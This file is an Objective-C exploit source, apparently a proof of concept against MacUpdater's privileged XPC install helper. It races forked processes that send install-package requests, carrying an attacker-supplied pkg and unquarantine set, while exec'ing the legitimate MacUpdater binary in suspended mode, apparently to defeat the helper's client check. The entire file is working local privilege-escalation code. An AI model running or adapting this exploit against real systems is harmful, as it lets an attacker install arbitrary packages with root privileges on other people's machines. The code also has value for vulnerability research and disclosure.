MacUpdater/exploit.m

#import <Foundation/Foundation.h>
#include <spawn.h>
#include <signal.h>

#define VALID_BINARY "/Applications/MacUpdater.app/Contents/MacOS/MacUpdater"
char * service_name = "com.corecode.MacUpdaterPrivilegedInstallHelperTool";

#define CHILD_COUNT 10

int main(int argc, const char **argv) {
    if (argc != 3) {
        fprintf(stderr, "usage: %s /full/path/to/pkg/file.pkg /Applications/APP_TO_REPLACE\n", argv[0]);
        exit(1);
    }

    const char * exploit_path = argv[1];
    NSString * expl = [NSString stringWithUTF8String:exploit_path];

    const char * dest_app = argv[2]; 

    extern char **environ;

    int pids[CHILD_COUNT];
    for (int i = 0; i < CHILD_COUNT; i++) {
        int pid = fork();
        if (pid == 0) {
            xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, 0 );
            xpc_connection_set_event_handler(conn, ^(xpc_object_t object) {
                NSLog( @"client received event: %s", xpc_copy_description(object));
            });
            xpc_connection_resume(conn);

            NSError * error;

            NSURL * url = [NSURL URLWithString:expl];
            NSData * data = [url bookmarkDataWithOptions:0
                                       includingResourceValuesForKeys:nil
                                                        relativeToURL:nil
                                                                error:&error];

            NSString * bencoded = [data base64EncodedStringWithOptions:0];
            const char * ss = [bencoded UTF8String];

            // create dictionary to send over xpc
            xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);
            xpc_dictionary_set_string(message, "newPath", dest_app);
            xpc_dictionary_set_string(message, "type", "installPKGViaApplesInstaller:");
            xpc_dictionary_set_string(message, "pkgURLData", ss);
            xpc_dictionary_set_bool(message, "unquarantine", 1);

            xpc_connection_send_message_with_reply(conn,message,NULL,^(xpc_object_t object) {
                    printf("received: %s\n", xpc_copy_description(object));
            });

            char target_binary[] = VALID_BINARY;
            char *target_argv[] = {target_binary, NULL};
            posix_spawnattr_t attr;
            posix_spawnattr_init(&attr);

            short flags;
            posix_spawnattr_getflags(&attr, &flags);
            flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
            posix_spawnattr_setflags(&attr, flags);
            
            posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);

        }
        printf("forked: %d\n", pid);
        pids[i] = pid;
    }
    sleep(20);

cleanup:
    for (int i = 0; i < CHILD_COUNT; i++) {
        pids[i] && kill(pids[i], 9);
    }

    return 0;
}